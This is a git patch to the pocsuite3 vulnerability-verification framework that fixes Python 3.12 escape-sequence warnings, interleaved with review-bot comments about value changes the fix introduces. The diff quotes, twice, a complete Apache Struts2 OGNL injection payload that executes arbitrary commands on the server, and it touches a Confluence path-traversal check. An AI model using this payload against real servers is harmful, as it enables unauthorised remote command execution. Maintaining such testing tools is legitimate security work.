From 2505bc8b1501866b9193398575c5653614e131f4 Mon Sep 17 00:00:00 2001 From: Branch Vincent Date: Sat, 20 Apr 2024 13:47:56 -0700 Subject: [PATCH] fix SyntaxWarning on python 3.12 As shown with `python3.12 -m compileall -f $(git ls-files '*.py')` --- pocsuite3/lib/core/settings.py | 4 ++-- pocsuite3/modules/spider/__init__.py | 6 +++--- pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py | 2 +- .../20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py | 4 ++-- 4 files changed, 8 insertions(+), 8 deletions(-) diff --git a/pocsuite3/lib/core/settings.py b/pocsuite3/lib/core/settings.py index cec7b82e..8246f9ec 100644 --- a/pocsuite3/lib/core/settings.py +++ b/pocsuite3/lib/core/settings.py @@ -39,7 +39,7 @@ "Usage of pocsuite for attacking targets without prior mutual consent is illegal." ) -BANNER = """\033[01;33m +BANNER = r"""\033[01;33m ,------. ,--. ,--. ,----. \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m | .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. | | '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' < @@ -57,7 +57,7 @@ BOLD_PATTERNS = ( "' is vulnerable", "success", - "\d ", + r"\d ", ) OLD_VERSION_CHARACTER = ("from comm import cmdline", "from comm import generic") diff --git a/pocsuite3/modules/spider/__init__.py b/pocsuite3/modules/spider/__init__.py index 75c65dea..68a053e1 100644 --- a/pocsuite3/modules/spider/__init__.py +++ b/pocsuite3/modules/spider/__init__.py 
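Review bot: The `r` prefix added to `BANNER` in the first settings.py hunk also changes the `\033[01;33m` / `\033[01;37m` colour sequences, because a raw string keeps `\033` as four literal characters instead of the ESC byte. Unless code outside this hunk decodes the string again, the banner would print those sequences verbatim rather than colouring the output. A value-preserving fix keeps the ordinary string, `BANNER = """\033[01;33m`, and doubles only the ASCII-art backslashes that trigger the warning (those art lines are not visible in this hunk). Comparing the old and new `BANNER` values for equality in a quick test would catch this kind of regression.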
@@ -73,9 +73,9 @@ def get_links(self, url, url_ext=()): def get_redirect_url(url): # TODO: # regex need more test cases - meta_regex = '(?is)\]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*' - body_regex = '''(?is)\]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*''' - js_regex = '''(?is)[^<>]*?location\.(?:replace|href|assign)[=\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?''' + meta_regex = r'(?is)\]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*' + body_regex = r'''(?is)\]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*''' + js_regex = r'''(?is)[^<>]*?location\.(?:replace|href|assign)[=\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?''' resp = requests.get(url) true_url = resp.url diff --git a/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py b/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py index e7cd9af9..a2d14eae 100644 --- a/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py +++ b/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py @@ -36,7 +36,7 @@ def _verify(self): r = requests.post(paylaod, data=data, headers=headers) if r.status_code == 200 and "" in r.text: - m = re.search('', r.text) + m = re.search(r'', r.text) if m: content = m.group()[:limitSize] result['FileInfo'] = {} diff --git a/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py b/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py index eae674c7..32d6fdd8 100755 --- a/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py +++ b/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py 
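Review bot: With the `r` prefix, the character class `[\d\w://\\\\.?=&;%-]` in all three patterns of `get_redirect_url` now lists the backslash twice, on top of the already redundant `\d` and doubled `/`. The matched set is unchanged, so this is a style point only, but `[\w:/\\.?=&;%-]` expresses the same class and is easier to audit. The TODO above the patterns says they need more test cases, and the captured value comes from a fetched page, so a small table-driven test of the three regexes would pin the behaviour this commit is meant to preserve. The function body continues outside the hunk.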
@@ -31,7 +31,7 @@ def _options(self): def _check(self): result = {} - exec_payload = "(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))" + exec_payload = r"(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))" paylaod = exec_payload.format(cmd=quote("id")) r = requests.get(self.url + "?" + paylaod) if "groups=" in r.text: 
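Review bot: Adding `r` to `exec_payload` in `_check` changes the string's value, not just the warning: every `\\u0023`, `\\u003d` and `\\40` that used to evaluate to a single backslash now stays as two, so the query string sent differs from the one before the commit. The SyntaxWarning comes only from the `\%27` sequences, so the value-preserving fix is to keep the string non-raw and write those as `\\%27`. As written, the `"groups=" in r.text` test may silently stop matching, and anyone using this module for verification would get a false negative. The identical literal in the `_attack` hunk that follows has the same problem. `_check` continues outside the hunk.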
@@ -52,7 +52,7 @@ def _attack(self):
 result = {}
 if p:
 cmd = self.get_option("command")
- exec_payload = "(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))"
+ exec_payload = r"(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))"
 payload = exec_payload.format(cmd=quote(cmd))
 r = requests.get(self.url + "?" + payload)
 if r.text:
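Review bot: The long `exec_payload` literal in `_attack` appears to be a character-for-character copy of the one in `_check`, so any escaping correction has to be made twice and the two copies can drift. Defining it once at module level, for example `_EXEC_PAYLOAD_TEMPLATE = "..."`, and calling `.format(cmd=quote(...))` on it in both methods would keep them in step. A short comment on that constant saying which sequences must evaluate to a single backslash would make later warning clean-ups safer. `_attack` starts and ends outside the hunk.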